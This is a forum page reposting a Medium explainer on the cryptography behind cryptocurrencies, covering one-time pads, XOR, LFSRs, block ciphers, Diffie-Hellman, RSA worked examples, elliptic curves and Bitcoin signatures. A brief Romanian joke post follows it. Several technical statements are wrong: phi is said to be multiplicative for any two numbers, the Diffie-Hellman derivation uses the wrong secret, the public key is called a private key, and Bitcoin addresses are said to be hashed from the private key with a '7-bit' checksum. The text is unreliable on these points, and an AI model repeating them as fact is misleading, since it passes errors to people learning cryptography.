Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 02/11/18 in all areas

  1. “One must acknowledge with cryptography no amount of violence will ever solve a math problem.” Cryptocurrencies like Bitcoin and Ethereum use a peer-to-peer decentralized system to conduct transactions. Since the entire process is online, there are fears that the transactions maybe volatile and hackable , but they are not because cryptocurrency uses cryptography to make their transactions extremely secure. Digital Signatures One of the most important cryptographical tools that are used in cryptocurrency is the concept of signatures. What is a signature in real life and what are its properties? Imagine a paper that you have signed with your signature, what should a good signature do? It should provide verification. The signature should be able to verify that it is you who actually signed the paper. It should be non-forgeable. No one else should be able to forge and copy your signature. Non-repudiation. If you have signed something with your signature, then you should not be able to take it back or claim that someone else has done it instead of you. In the real world, however, no matter how intricate the signature, there are always chances of forgery, and you cannot really verify signatures using simple visual aids, it is very inefficient and non-reliable. Cryptography gives us a solution to this by means of “digital signatures” which is done via the use of “keys”. So, what are keys? And how are the used in the blockchain? Before we explore those, it is important to know more about basic cryptography. What is Cryptocurrencies Cryptography? Cryptography is a method of using advanced mathematical principles in storing and transmitting data in a particular form so that only those, for whom it is intended for, can read and process it. Cryptography has been used for thousands and thousands of years by people to relay messages without detection. In fact, the earliest use of cryptography was seen in the tomb taken from Old Kingdom in Egypt circa 1900 BCE. Cryptography has existed in the modern society through one way or another. Encryption is one of the most critical tools used in cryptography. It is a means by which a message can be made unreadable for an unintended reader and can be read only by the sender and the recipient. In modern technology, there are three forms of encryption that are widely used, symmetric cryptography, asymmetric cryptography, and hashing. Symmetric Cryptography Symmetric cryptography is the earliest known cryptographic method known to man. The concept is very simple and if we were to break it down to steps, this is what it will look like: You have a message M that you want to send over to your friend. You encrypt the message with a Key and get a cipher text C. Your friend gets your cipher text C. She then decrypts the cipher text using the same Key to retrieve message M. If we were to show a visual representation of the process, this is what it will look like. The are two types of symmetric cryptography: Stream Ciphers. Block Ciphers. What is stream ciphers? Stream cipher basically means using a fixed key which replaces the message with a pseudorandom string of characters. It is basically the encryption of each letter one at a time. We are going to discuss 3 kinds of stream ciphers to give you an idea of how stream ciphers work: One-time pad with alphabets. One-time pad with XOR gate. Linear feedback shift register. One-time pad with alphabets For doing this encryption we need to have a key which has the same number of characters as the message and it must be used one time only (hence the term “one-time pad”). Suppose for this example we are going to send a message, “MEET ME OUTSIDE” to our friend Bob. But we don’t want anyone intercepting our message. This is why, Bob and us have decided to use a one-time pad which goes like this: “B D U F G H W E I U F G W” As you can see, the pad has the same number of characters as the message as well, i.e. 13. Now, this is a very simple example of the one-time pad, we are using this because we feel it is the best example to use to understand this tactic. Now, one more thing you need take note of, every alphabet will be replaced by its numeric equivalent in during the process. The numerical mapping goes like this: During the process, there will be 6 pieces of data that we need which are: Basically, the numerical equivalent of each alphabet. Ok, now that we have built the foundations, let’s move on to the actual process. Original Message (OM): The original message that we are passing through. In this case “MEET ME OUTSIDE”. Numerical Original Message (NOM): The numerical equivalent of the original message, OTP: The One-time Pad. Numerical OTP (NOTP): The numerical equivalent of the OTP. NCT: The numerical cipher text which is NOM+NOTP mod 26 CT: The cipher text which is the alphabetical equivalent of the numbers in the NCT. So, we need to send the message “MEET ME OUTSIDE” and we need to use the one-time pad to encrypt it. The encryption process So, let’s start off by putting in the message in the OM We put the message “MEET ME OUTSIDE” in the OM row.Ok, so what happened here? Next, we used the numerical mapping table to get the numerical equivalent of each alphabet. So, let’s refer to the mapping table and see what we get: In the OTP row we put in the key that we were already given which is, in case you have forgotten, “B D U F G H W E I U F G W”.It’s just simple substitution, we will take these values and put it in NOM row. Now, in the NOTP row we used the same number mapping table and found the equivalent numerical values of the key which are: “1, 3, 20, 5, 6, 7, 22, 4, 8, 20, 5, 6, 22”. In the new row, for the Numerical cipher text (NCT) we add the NOTP and NOM and mod the result by 26 to get our NCT. So, finally the message “MEET ME OUTSIDE” turns into a pseudo-random series of characters “N H Y Y S L K Y B M N J A”.That’s how you find the values for NCT and then you use the mapping table and find the corresponding alphabets which are: “N H Y Y S L K Y B M N J A”. That is how the encryption process works. The decryption process Now we will see how we can decrypt the message using the exact same key. Let’s see the data that Bob has with him: He has the encrypted message that he has gotten from me. He has the key that both of us share. He has the mapping table to find the numerical equivalents. So, how will he decrypt the message using this data? He will map the numerical values of both the key and the encrypted message to get NCT and NOTP. He will then calculate the NOM (Numerical value of the original message) by doing this calculation: NOM = NCT — NOTP mod 26. He will use the mapping table to retrieve the corresponding alphabets. So, let’s see how the NOM calculation work? Now, if we map the NOM to its alphabetical equivalent using the mapping table then we get: “MEET ME OUTSIDE” And just like that, the message is encrypted and decrypted using the same key. One-time pad with XOR gate XOR or “Exclusive OR” is a logic gate. What is a logic gate? A logic gate usually takes in 2 inputs and gives out 1 output. The inputs and outputs are binary values, meaning they can be 1 or 0. A XOR logic gate takes in 2 binary inputs and gives out a high output ONLY when the inputs are different. Meaning, if A and B are inputted to a XOR gate then the out C will be 1 ONLY when A is not equal to B. The XOR gate looks like this: This what the XOR truth table look like: The encryption process Suppose you have a plain text data which you want to send to your friend Alice. First, you’ll convert it to its binary form. Suppose the message that you have is this: 00011110 Now you have the key, the key that you share with your recipient and suppose you have passed the key through an algorithm which gives you the equivalent binary result: 01001010. So now that you have the key, you are going to XOR each corresponding individual bits to get the resulting cipher text output. Cipher Text = Plain Text XOR Key So if you XOR both the data the key that you will get is: “01010100” This is the cipher text that Alice will get from you. The decryption process So now, how will Alice decrypt your message and retrieve the original one? This is the data that she has: So what is she going to do? It is simple. She will simply XOR the key and the cipher text and she will retrieve the original message! See for yourself: And just like that, she will retrieve the original message. Linear feedback shift register What is a linear feedback shift register? It is a function whose future output completely depends on its earlier (or current) state. This will become clearer as you keep reading so don’t get scared off! The idea of this style of a stream cipher is to predetermine a key with your recipient which will be a linear feedback shift register function which will be used by you to determine the code. Suppose you spoke to your friend Bob and determined that this is the formula that you both want to go with (credit to Daniel Rees from Youtube for this formula). E(i+3) = E(i+1) + 2E(i+2) mod 26. And let’s also assume that prior to sending this message you and Bob determined that E(1) = 2 and E(2) = 4. Now you can see that in this equation, all future outputs are dependent upon the previous outputs. So, suppose the message that you want to send to Bob is “MEET ME”. Since there are 6 characters, we need to determine 6 values of E() to act as key. We already have predetermined the values of E(1) and E(2). Now we need to calculate E(3) to E(6). E(3) = E(1) + 2E(2) mod 26 = 10. E(4) = E(2) + 2E(3) mod 26 = 24. E(5) = E(3) + 2E (4) mod 26 = 6. E(6) = E(4) + 2E(5) mod 26 = 10. So, now that we have the keys, let’s start the decryption. The encryption process So now that we have the key and message, let’s create the table: To get the numerical cipher text, you add the key and the corresponding numerical value of the alphabet that you map from this table that we have already seen before: Now, to get the numerical value of the cipher texts, add the key and the numerical value of the original message and mod with 26. So you get: Now use the mapping table again to find the corresponding alphabets and you get “OIORSO”. That’s the encrypted message. The decryption of this message is really hard especially if you don’t have the key. An expert might spot a pattern though. You will need computers to beak this code. Examples of Stream Ciphers used in the real world. The Rivest Cipher 4 of the RC4 Used in WEP aka wired equivalent protocol for wireless network security. Also an option in TLS/HTTPS for encrypting web traffic. Since it has been cracked so many times it is not recommended for use anymore. The A5/1 Use for encrypting GSM (Global System for Mobile communication) phone data and communication. Edward Snowden in his leaks revealed that the NSA routinely keeps breaking GSM for surveillance purposes so it is not a secured mode of encryption anymore. So, that is pretty much it about stream ciphers, time to move on to block ciphers. What is block ciphers? Block ciphers are a form of symmetric cryptography which uses a key of a fixed length to encrypt a block of fix length. Let’s start by checking out a very common substitution cipher that you must have seen before: So, if someone were to tell you that they got a message which says “EFBD” and wants you to decrypt it and get the original message instead, how will you do it? You will simply see the table, see which alphabets correspond to which and then simply substitute right? So “EFBD” is the cipher for “FACE”. Now let’s check out the plain text and the ciphertext and compare them: Plain: A B C D E F Cipher: F A B C D E So, as you can see, the cipher text is basically the plain text shifted the right by one. So, in this particular case: That, in essence, is what a block cipher is. Given an input plain text and a key it can generate a unique cipher text. One more thing that is extremely important and should be noted. Given the key, anyone can decipher the cipher text from the plain text and vice versa. The examples that we are giving here are all extremely simplistic, the block cipher happens with HUGE chunks of data. If we are looking for a visual representation of a block cipher the this is what it will look like: Another interesting property of the block cipher is that if the key changes then that changes the output cipher text pretty drastically. Let’s do a test with the data we have right now. Now, we have 3 keys for the 3 different cipher texts. In cipher text 1 we are shifting to the right once. In cipher text 2 we are shifting to the right twice. In cipher text 3 we are shifting to the right thrice. So, let’s see what happens when we parse the input “FACE” through all these different ciphers. When key =1, FACE becomes EFBD When key = 2, FACE becomes DEAC When key = 3, FACE becomes CDFB As you can see, the output cipher text changes everytime you change the key. In the example we have very little data, imagine doing this with HUGE amounts of data, the output will change drastically every single time. There are two rules for a block cipher to be considered valid: You must be able to derive the plain text from the cipher text and vice versa given a key. The function must be efficiently computable. There is one more important thing that you need to take note of when it comes to block ciphers. The block sizes are fixed so the input plain text needs to be of the same size as the block size. If the input is bigger than the block then it needs to break down to get the correct size, if the input is smaller, then it needs to be padded with some junk data to fit the block size. Examples of block ciphers Data Encryption Standard (DES) Block sizes of 64 bits. Key size of 56 bits. Was the government standard till 2001. Advanced Encryption Standard (AES) 128 bit blocksize. 128, 192 or 256 bit key size. Considered very secure and widely used nowadays The advantage of symmetric cryptography Even though symmetric cryptography has some major problems (which we will discuss in a bit) the biggest advantage of symmetric cryptography is that it requires very little overhead. You just need to share one single key with your recipient to go forward with this method. Even now, a lot of software use this method in conjunction with asymmetric cryptography to provide fast and efficient encryption/decryption services. The problems with symmetric cryptography Even though the overhead is significantly lesser, there are a lot of problems with symmetric cryptography. Problem #1: The shared key The fact that the encryption and decryption is done with one single key is a huge problem. First and foremost, the sharing of the key needs to be done in a very secured manner, if anyone gets hold the of key then all your data will be compromised. Problem #2: It is not scalable Another huge problem with symmetric cryptography is that it is not scalable at all. Suppose Alice runs an information center and sends data via symmetric key cryptography. It’s ok if she is only dealing with 3–4 clients. But the most clients she gets, the more unique public keys she will have to handle and take care of. Eventually, it will become too much to handle. Because of these vulnerabilities of symmetric key cryptography, a solution was needed, and in the 1970’s it finally came. James Ellis’s breakthrough In 1970, British mathematician and engineer James Ellis thought of an idea which was based on a simple concept. What if encryption and decryption were inverse operations based on 2 different keys? In traditional cryptography i.e. symmetrical cryptography, the message had to be sent along with the key to the intended person for them to decrypt the message, but this presented the very real idea of an attacker getting their hands on the key. Ellis envisaged that the receiver of the message couldn’t be a passive party, and they had to have a “padlock” and a “key” for themselves. The padlock could be sent to anyone in the world but the key had to be kept private. So, anyone can send a message to the receiver by locking it with their padlock and since only the receiver has the key, only they can open it. Now, this was the theory, there needed to be a practical form of this theory, and that came because of two brilliant principles: The trapdoor function. The Diffie–Hellman key exchange. What is the trapdoor function? A trapdoor function aka a one-way function is a function where it is easy to go from one state aka the domain to the other state aka the range but it is hard to go back from the range to the domain unless you have knowledge of a key which is called the trapdoor function. Diagrammatically it is represented like this: The trapdoor functions are based on the idea of keys. Wherein the public key (K) is used to go from the domain to range. In order to come back to the domain from the range we have to use a trapdoor function which is also known as the private key (k). It is also implied that the private key and public key are mathematically related to each other and also they have to related to each other via another trapdoor function f() such that K= f(k) so that the private key is infeasible to be determined by the public key . A simple example of this is a multiplication of large numbers. Suppose you have two numbers 171 and 118 then it is simple to determine that 171 * 118 = 20178. However, if you just know 20178 then it is hard for you to determine what the initial numbers were unless you have a key with you, in this case the knowledge of just one of the two numbers, to determine the second one. What is the Diffie-Hellman key exchange? Suppose, there are two people Alice and Bob and they want to attack a bank. However, they are on either sides of the bank and they can only communicate with each other via a shared line which is being tapped by the bank. Something like this. Keep in mind, everything that Alice and Bob say to each other will be eavesdropped upon by the bank. So, how can they both decide on a date to attack the bank without the bank getting to know about it and without Alice and Bob explicitly exchanging that information? This conundrum can be answered by the Diffie-Hellman key exchange; it is a concept by which two parties can get hold of secret information without sharing it. To understand how the Diffie-Hellman works, we need to use one of the most famous applications of this theory, the secret colour exchange. For this there are 3 things that you need to keep in mind: Alice and Bob both publicly agree that yellow is going to be the common paint that they are both going to use. Alice then secretly keeps to herself that she is also going to use orange along with yellow. Bob secretly decides that he is going to use aqua along with yellow. Stage One Since it was publicly declared that yellow is going to be the colour of choice: Bank: Has Yellow Alice: Has Yellow Bob: Has Yellow Stage Two Now Alice mixes in her private colour aka orange with yellow and gets a composite colour which we will call CA. At the same time, Bob mixes his private colour aqua with yellow and creates composite colour CB. So, at the end of stage two this is what things look like: Bank: Yellow Alice: CA Bob: CB Stage Three Now, Alice and Bob will send each other their respective colours, which will promptly get tapped by the bank. However, the bank now faces a problem. Colour combinations are a trapdoor function. While it is easy for someone to combine two colours and generate a third colour, it is infeasible for them to determine the first two colours from the given third colour. So, the bank will get hold of CA and CB but will have no idea which are the colours that has gone into its creation. So, this is what things are looking like right now: Bank: Yellow, CA, CB. Alice: CB Bob: CA. Stage Four Now, Alice and Bob are once again going to mix their secret colours into the mix that they have received from the other person, so now both of them are going to have a mix of yellow, orange and aqua which is brown. The bank, however, will only have CA and CB because they have no idea what the secret colours are. So, this is what things look like now: Bank: Yellow, CA and CB. Alice: Brown. Bob: Brown. And this is where the trick lies, by not revealing their secret colours, both Bob and Alice have, in their possession, the colour brown, even though they never explicitly exchanged brown with each other. This is what the diagram of this entire exchange looks like: This is the representation of the Diffie-Hellman exchange, but a mathematical means was needed to make sure that there could be practical applications of this as well. For this reason, the modulus function was used. The mathematical form of the Diffie-Hellman exchange Suppose there is a generator g for a finite field of size n. And in that field, we choose two random values a and b. It will be hard for an attacker to determine g^ab given only g, g^a and g^b. This is the condition which activates the trapdoor function. Given this condition, two parties can exchange messages and reach the same conclusion without explicitly communicating it with each other. So, mathematically this is what happens. Alice chooses a random value “a” from the field n and determines a message M1 such that: Similarly, Bob chooses a random value “b” from the field n and creates message M2 such that: Both Alice and Bob can now relay the message to each other. Alice now determines special message K by doing the following: K = M2^a mod n= g^ab mod n. Bob now determines the same message K by: K = M1 ^ a mod n = g^ab mod n. So, both Alice and Bob reached the same conclusion without explicitly sharing this information. This Diffie-Hellman key exchange was invaluable in the formation of asymmetric cryptography: What is asymmetric cryptography? Asymmetric cryptography utilizes two keys, a public key and a private to encrypt and decrypt a particular data. The use of one key cancels out the use of the other. The diagrammatic representation of it looks like this: There are two real world use of asymmetric cryptography that we will look into in this guide and both are important for their own reasons: The Rivest-Shamir-Adleman algorithm aka the RSA. The Elliptical Curve Cryptography. What is the RSA algorithm? The RSA algorithm is the most widely used and popular asymmetric cryptographic algorithm in history. It is named after MIT professors Rivest, Shamir and Adleman who discovered this algorithm. Now, how does it work? The idea is derived from the breakthroughs that Diffie-Hellman had. So, these are the variables that we will work with: Suppose you have the secret message “m”. “m” raised to the power of a random number e and then the modulus of that with a random number N will give you the cipher text c. Basically. m^e mod N= c Take note, it is EASY to perform this function to get the output c BUT given only c, e and N it is difficult to get the message “m”. It will require a lot of trial and error. This is the one-way trapdoor function that we will apply to find “m”. But now, the idea of the trapdoor function is to have a key which will make the reverse process (the decryption) simple for the recipient. So, for that we will need to find a random variable “d” which will make this process possible: Now keep in mind, c = m^e mod N, so on substituting. OR So, in the above equations: Public key = e and N. Private key = d. Now, before we even begin to see the method behind the madness, let’s do a simple calculation to see how the entire process works. (Shout out to Anthony Vance’s youtube channel for this example). Suppose the message that you have to send is 42. In other words, m=42. Along with that: e = 17. N = 3233. d = 2753 The encryption process c = m^e mod N. Using simple substitution: c = 42¹⁷ mod 3233 = 2557. So the cipher text is 2557. The decryption process Let’s do c^d mod N. 2557²⁷⁵³ mod 3233 This gives us the value of m that is 42. Genius isn’t it? Now, remember when we talked about trapdoor functions we came to the conclusion that private and public key needs to be mathematical derivatives of each other in a way that: F(private key) = public key, where F() is another trapdoor function. It should be difficult for anyone to determine the private key from the public key. In fact, it should be so difficult that it will take the world’s most powerful computer decades upon decades to derive one from the other. To answer this conundrum, we go back centuries and meet our next genius, Euclid. Euclid and prime factorization Euclid found out centuries ago that any number > 1 can be written as a product of prime numbers. Eg. 15 can be written as 5*3. 255 can be written as 5*17*3. Let’s go back to our two equations: C= m^e mod N. Here, N is the key in the trapdoor function. While N maybe publicly known it should be hard to determine prime factors that make up the number N. If you know the prime factors, then it is child’s play to discover the product N. Eg. You can use your web browser to multiply two huge numbers and find the product in less than a second: It took less than a second, 0.22 seconds, to do the calculation. And the bigger the number gets, it will take a little more time, but still, the calculations will be done super fast. However, if you input a huge number and ask your computer to find its prime factors then it may take days, months and even years to find the prime factors. This is the trapdoor function that cryptographers used to determine the value of N. This is basically, the heart of the trick. This is what you have to do to use RSA algorithm: First, generate a big random prime number P1. Generate a second big random prime number P2. Find N by calculating P1 and P2. Hide the values of P1 and P2 and make N public. N should be a huge number and it will take the most sophisticated machines in the world decades to find the values of P1 and P2. So to summarise, N is the trapdoor and its prime factors P1 and P2 are the keys to the trapdoor. Ok, so now we have determined how N is calculated and the trapdoor that works in it. But we still haven’t determined the value of “e” and “d” and we still haven’t seen how the private key is derived from the public key. In order to generate all these remaining values, we need to find a function that depends on knowing the factorization of N. And for that we need to go and visit our next genius, Leonhard Euler. Euler and breakability In 1760, Swiss mathematician Leonhard Euler did some path breaking studies. He studied the nature of numbers and more specifically the breakability of the numbers which he called the phi function. Basically given phi(N) where N is a random integer, the value of N will be the number of numbers between 1 and N which do not share any common factors with N. So, if N is 8 then: The numbers between 1–8 are: 1,2,3,4,5,6,7 and 8. Among these numbers, only 1,3,5 and 7 don’t share any factors with 8 except 1. Meaning, phi(8) = 4. Now, calculating the phi function is difficult except for one case. To know this, check out the following graph. The graph tracks the distribution of phi values over integers upto 1000. See that straight green line at the top which is conveniently arranged? That is the phi of prime numbers. Since the definition of a prime number is that it is unfactorizable apart from by itself, for any prime number p the phi(p) = p-1. Let’s see this in practice. Suppose you have a prime number 7. The numbers between 1 and 7 are: 1,2,3,4,5,6,7. The only number that shares a factor with 7 in this series is…7! So the phi(7) = 6. Similarly, if you were to find the phi of a large prime number say 541 then: Phi(541) = 541–1 = 540. It becomes very simple to calculate the phi for a prime number. And this gains, even more, significance when you consider the multiplicative nature of phi functions. What is the multiplicative nature of phi functions? For any two numbers A and B: Phi(A*B) = phi(A) * phi(B). Now, let’s go back to algorithms. Alice has determined two large prime numbers P1 and P2 and has determined a number N by doing P1 * P2. So, using the multiplicative property of phi functions: Phi(N) = phi(P1) * phi(P2). OR Phi(N) = (P1–1)*(P2–1). And just like that, we have discovered the trapdoor function for phi. If we know the prime factors of N then it is easy to calculate the phi(N). For eg. the number 77 has prime factors 7 and 11. So phi(77) = (7–1)*(11–1) = 60. It becomes very easy when you know the prime factors of N. Now, one final bit of mathematical wizardry was required. We have the phi function and we have the modular exponentiation functions that we have determined before, we need to bring these two together in one neat equation. And for this, we turn to Euler for help once again. The Euler’s theorem Euler’s theorem states that: For any two numbers m and n that don’t share a factor: m ^ phi(n) ≡ 1 mod n Meaning, for any two numbers m and n, as long as they don’t share a factor, m raised to the phi(n) divided by n will always leave a remainder of 1. Let’s see this in an example. Suppose, m= 8 and n = 5. Phi(5) = 4 So, 8 ^ 4 = 4096. Replacing this in the Euler’s theorem equation: 4096 ≡ 1 mod 5 holds true because 4096 on being divided by 5 leaves a remainder of 1. Now, the equation: m ^ phi(n) ≡ 1 mod n needs to be modified a little bit before we get our final solution. Modification #1 1^k = 1 for all k. So, keeping this in mind, if in m ^ phi(n) ≡ 1 mod n we multiply the exponent phi(n) with any number k, the final solution will be 1^k which is still 1. Now, this modifies the equation like this: m ^ k*phi(n) ≡ 1 mod n Modification #2 For all m, m*1 = m. So, in our modified equation, if we multiply both sides by m we get: m*m ^ k*phi(n) ≡ m*1 mod n Which becomes: m ^ k*phi(n)+1 ≡ m mod n Now, this is the final form of our equation. Before we proceed, let’s bring back the old equations to refresh our memory: c = m^e mod N. m = c^d mod N m ^ e*d mod N = m Now, checkout the last equation doesn’t that look similar to our new modified equation: m ^ k*phi(n)+1 ≡ m mod n And this is the breakthrough. On comparing the two equations, we get: e*d = k*phi(n) + 1 We FINALLY have an equation where the value of e and d depends on phi(n). Now, since we already know the value of e, it is easy to calculate d, the private key, ONLY if the factorization of N is known (which is a secret that Alice has kept to herself). So, d= (k*phi(n) + 1)/e. This is the trapdoor that will undo the encryption done by her private keys e and n. Example to see how this all works Suppose Bob and Alice are exchanging messages. Bob wants to send a message M to Alice where M=89. Now, Alice needs to generate her keys. She uses to prime numbers p1 and p2 where: P1 = 53. P2 = 59. N = P1 * P2 = 53 * 59 = 3127. Phi (N) = Phi(P1) * Phi (P2) = (P1–1) * (P2–1) = 52 * 58 = 3016 Now, she needs to generate a value e which will have no factors with the value of phi(N). So, she decides e = 3. Now, she will generate her private key d: d = (k*phi(N) + 1)/e Taking k = 2 we get: d = (2* 3016 + 1) / 3 = 2011. Now, she will lock up all the values except N and e which are her public key and make the knowledge of these two global. Bob encrypts the message Now, Bob needs to send message M, which is 89, and he needs to calculate the cipher text c such that: c = M^e mod N. Now, we know that: M = 89, e = 3 and N = 3127. So: c = 89³ mod 3127 = 1394. He then sends it over to Alice. Alice decrypts the message Alice gets the cipher text and all that she has to do is to decrypt it using her private key d which we know to be 2011. So, Alice does this calculation: c^d mod N 1394²⁰¹¹ mod 3127 which is 89 aka the original message M. And this, is the RSA algorithm, the most widely used cryptographic algorithm What is elliptical curve cryptography? Elliptical curve cryptography is what is used by bitcoin, ethereum etc. for their encryption purposes. So what is an elliptical curve? An elliptical curve is any curve that satisfies the following equation: Y² = x³ + ax + b Where (x,y) is a point on the curve and a and b are constants. There are infinite curves that you can make. The following is how one of these curves, in general, look like: What are the properties of an elliptic curve? The curve is symmetric across the x axis. Any line that goes through 2 points on the curve will intersect the curve on a third point. Any tangent on the curve will intersect the curve on one more point. Performing maths on the curve. Addition property of the curve Suppose there are two points on the curve V and A. Let’s trace those on the curve and put a line through them. This will intersect the curve on a third point. We will call this third point X, and we will reflect it on the curve like this: The reflection of X is a point which will incidentally be (V+A). This is the additive property of the elliptical curve. Interesting note. If we add two reflections with each other aka if we were to add X and V+A in the graph above, we will get infinity. The reason for that is that the line through X and (V+A) will intersect the curve at infinity. Multiplication property of the curve Now, what if we want to add a number to itself? Like suppose we have a point V, what do we do to find 2V? We will run a tangent through V and intersect it at a point in the graph and then find the reflection of the point on the curve. That reflection will be 2V. This is also the multiplicative property of the graph because we are finding points which are basically the multiplication of an integer with the point itself. Now suppose we want to find 3V. We will join V and 2V and then reflect the point of intersection, like this: You see how the points cycle across the graph? This is what gives it its security. Mathematical properties of an elliptical curve Property #1: The points on the curve form an Abelian group The properties of the Abelian group are as follows: They have identity. The have inverses aka reflections. The points are associative meaning for three points A, B and C on the curve: (A+B) + C = A + (B+C). The points are closed on the curve. The points are commutative meaning for two points A and B. A+B = B+A. Property #2: Multiplication on the curve is fast All multiplication done on the curve can be done very fast. Now suppose we have a point P and we want to find 100P. Instead of adding the number to itself 100 times we can do the following: Add the point P to itself to get 2P. Add 2P and P to get 3P. Add 3P to itself to get 6P. Add 6P to itself to get 12P. Add 12P to itself to get 24P. Add 24P and P to get 25P. Add 25P to itself to get 50P. Add 50P to itself to get 100P. So, instead of going through 99 steps you cut short the entire thing to just 8 steps. Property #3: Division on the curve is slow Whilst multiplication is fast, the division is very slow. Suppose we have Q = nP and we want to find the value of n by dividing Q by P. We can’t really do that. We will have to manually go through the numbers one by one to find a value which satisfies the equation. This makes it very slow. This is called the discrete logarithmic problem and this is what gives the curves its trapdoor function i.e. it is easy to multiply n and P to get Q but given Q and P it is infeasible to get n. The elliptical curve Diffie-Hellman key exchange So, till now we have seen the various properties of the curve and we have also seen that the curve has a trapdoor function. Now how do we determine whether it is usable for cryptography or not? Let’s test it out with the Diffie-Hellman key exchange. Suppose we have Alice and Bob and they want to both come up with a common secret without anyone knowing what it is and without explicitly exchanging its information with one another. How will they do that via elliptical curves? Firstly, they will publicly agree on a curve to use and a point P on the curve. This will be public knowledge and available to everyone. In secret, however, Alice will choose a secret point “a” and Bob will choose a secret point “b”. Alice will compute “aP” and send it over to Bob. Anyone can intercept this message, however, even with the knowledge of P they will never be able to determine the value of “a” because, as we have already determined, there is a trapdoor function which will make division infeasible. Similarly, Bob will come up with the value “bP” and send it over to Alice. Alice will then multiply her secret key to the message that she gets from Bob to get a(bP). Bob will do the same and come up with b(aP). Since all the points on the curve are Abelian: a(bP) = b(aP). And just like that, they have come upon a secret shared information. So as we can see. The curve satisfies the Diffie-Hellman key exchange. So how does signature verification work on the elliptical curves? (Note: This is what specifically happens in bitcoin) Before we see how the process works let’s checkout certain variables and their meaning that we will be using the following equations. Private key = d. Message = z. Public key = Q. G will be a constant point on the graph which will be provided by bitcoin. “k” is a random number which will be generated automatically for every unique signature. “n” is another constant that will be provided by Bitcoin. Ok, so now let’s see how the maths behind the verification work. Signing a message Public key Q = dG. (it is impossible to get the private key from Q and G because division in infeasible). Now we will multiply the G with the random number “k” and plot that point on the graph. The co-ordinates of that point are (x,y). i.e. (x,y) = kG Next, we determine two values r and s such that: r = x mod n. s = (z + rd) k^-1 mod n The reason why we generate r and s is because these are the co-ordinates of our signature. So, we send the point (r,s) for verification. Verifying a message The verifiers will conduct a simple equation: z*s^-1*G + r*s^-1*Q The value of this equation will give us the point (x,y). Now, the verifiers can simply compare the x co-ordinates. They don’t have the x co-ordinate given directly to them from the sender BUT they have the values of r and n. And as we already know that r = x mod n, and then they can simply solve for x. If the values of x match out, then this means that the signature is verified! Bonus: A deeper look into the maths Let’s check out the equation that the verifiers will have to do once again: Step 1: z*s^-1*G + r*s^-1*Q We know that Q = d*G, let’s simply substitute the value. Step 2: z*s^-1*g + r*s^-1*d*G We can take (z + r*d) common Now remember, we have already established that s = (z+r*d)*k^-1 mod n ,let’s substitute the values here: Step 4: (z+r*d)*(z+r*d)^-1*k*G The (z+r*d)*(z+r*d)^-1 cancel each other out and we are left with: Step 5: k*G which is the co-ordinate (x,y) that the sender originally sent. What could go wrong in Elliptical curves? While it goes without saying that elliptical curves are the best mode of cryptography out there, the fact remains that it still has few vulnerabilities: What if a wrong curve was chosen? If the curve has a loop in it then there is a possibility that 1001P = P for any point P on the curve. A weak curve maybe is chosen which can be broken into. It has its weaknesses but they are pretty manageable weaknesses. RSA vs EEC. Why did bitcoin and ethereum go with elliptical curves? The reason why EEC was chosen over RSA is because it offers the same level of security as RSA by consuming far less bits. Eg. for a 256-bit key in EEC to offer the same level of security RSA will have to provide a 3072-bit key. Similarly, for a 384-bit key in EEC the RSA will have to provide a 7680- bit key to provide the same level of security! As can be seen, EEC is far more efficient than RSA. Fun Fact: The NSA has declared that a 384-bit key in EEC is strong and secure enough to encrypt top level secret documents. How do the keys work in blockchain? As mentioned above, bitcoin and ethereum use elliptical curve cryptography. So, what happens when someone sends you money on the blockchain? They send you the money to your public address which is basically the hash of your public key and some additional information. As we have seen above, the public key is derived mathematically from your private key. Public and private keys are both large integer values and they are represented, for brevity’s sake, via the Wallet Import Format (WIF) which consists of letters and numbers. A sample private key and public address looks like this in WIF: Obviously, you shouldn’t share your private key with the world like we just did! The private key is used to sign off on the transaction that the user wants to do. So, if someone has access to your private key, they can sign off on transactions using your private key and, in essence, steal from you. Also, as you can see, the private key is longer than the public address. So, how is a public key derived from the private key in the blockchain? Let’s take the example of bitcoin for this specific example. Suppose, Alice wants to generate her keys so that she can conduct transactions on the blockchain. This is what she will do: First, she will generate her 256-bit private key. She can either do so manually OR she will use an auto-generator. This is an example of a private address generator that you can find in a wallet-generator.net: Next, she will have to generate the public address which the algorithm inside that wallet will do automatically by following these steps. First, her private key will be parsed through the SHA 256 hashing algorithm to get a hash. Then hash will be parsed through the RIPE MD 160 function and a new hash will be generated and a copy of it will be kept aside, let’s call this PART A. Then the hash will be hashed through SHA 256 to generate another hash. Then the new hash will be hashed through SHA 256 again to generate another hash. The first 7 bits of this hash will be saved, let’s call it PART B. PART A and PART B will be added up and the result is the public address. It is infeasible for this process to be reversed in a way that the public address can be used to generate the private key. It will take the world’s most powerful computer 40000000000000000000000000000000 years to complete this calculation! Safe to say your address and key are secure. So how does the signing process work (a simple overview)? Suppose Alice wants to send 500 BTC to Bob. She will follow the following steps: She will create transaction and sign it off with her private key. She will the send the transaction to Bob’s public address. Bob can then decrypt the message by using Alice’s public key to verify that it was indeed Alice who sent him the bitcoins and the transaction is deemed complete. If this were to be shown in an image this is what it will look like: Conclusion So, as can be seen, public key cryptography aka asymmetric cryptography is one of the backbones of cryptocurrency. It is impossible to even imagine how bitcoin and ethereum would have been secure without it. Every time you make a transaction, be thankful to all the mathematicians and cryptographers who have made this wonderful medium possible. If you enjoy my articles , please feel free to nominate me as a LinkedIn Top Voice . Sursa: https://medium.com/@jna1x3/holy-grail-of-crypto-cryptocurrencies-the-science-of-cryptography-773851a23b3c
    3 points
  2. @MrGrj - Fa bre omului scriptul vietii, stai ascuns ca muierile ?:)))
    2 points
